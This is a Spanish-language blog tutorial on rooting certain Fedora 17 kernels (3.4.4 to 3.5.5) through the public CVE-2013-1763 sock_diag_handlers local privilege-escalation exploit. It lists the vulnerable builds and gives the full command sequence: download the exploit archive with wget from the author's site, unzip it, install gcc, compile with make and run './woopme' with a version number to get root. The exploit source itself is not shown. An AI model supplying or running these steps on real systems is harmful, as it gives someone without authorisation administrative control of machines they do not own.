Home / Tutoriales / Fedora 17 Local Root Exploit [2013] CVE-2013-1763 sock_diag_handlers

Fedora 17 Local Root Exploit [2013] CVE-2013-1763 sock_diag_handlers

Hace unos días se hizo publico un exploit que tenía unos meses ya funcionando, hasta que alguien lo hizo publico en Pastebin, en está ocasión lo pruebo, a pesar de que dice afectar las versiones del kernel del 3.3 a 3.8, no es del todo cierto.

La instalación por defecto de Fedora 17, tiene una versión del kernel NO vulnerable, la versión de Fedora 18 ya viene con una versión de Kernel superior a 3.8. Así que solo funciona con ciertas actualizaciones en Fedora 17.

La vulnerabilidad permite escalar privilegios a través de sock_diag_handlers[], las versiones exactas de Fedora que son vulnerables son:

  • 00 Fedora Core 17 3.4.4-3.fc17.i686 #1
  • 01 Fedora Core 17 3.5.2-3.fc17.i686 #1
  • 02 Fedora Core 17 3.5.5-2.fc17.i686 #1

Para rootear estas versiones hacemos lo siguiente:

Descargamos el exploit, en una terminal ejectutamos:

wget http://xora.org/root/[2013]-sock_diag_handlers-3.3-3.79.zip
Mirror: http://xora.org/root

Extraemos y entramos a la carpeta

unzip [2013]-sock_diag_handlers-3.3-3.79.zip
cd [2013]-sock_diag_handlers-3.3-3.79
Fedora 17 Local Root Exploit

Fedora 17 Local Root Exploit

Para compilar necesitamos gcc, si no lo tienes instalado:

sudo yum install gcc

y ahora compilamos

make

y ejecutamos

./woopme 00

Sustituye 00 por la versión correspondiente [00, 01, 02]

Fedora 17 Local Root Exploit

Fedora 17 Local Root Exploit

Más información en:

Post para xora.org & evafedora.org.

About Ricardo Osorio

WebDeveloper, Geek, Pentester y SysAdmin | Fundador de www.xora.org @HackeaMesta contacto@xora.org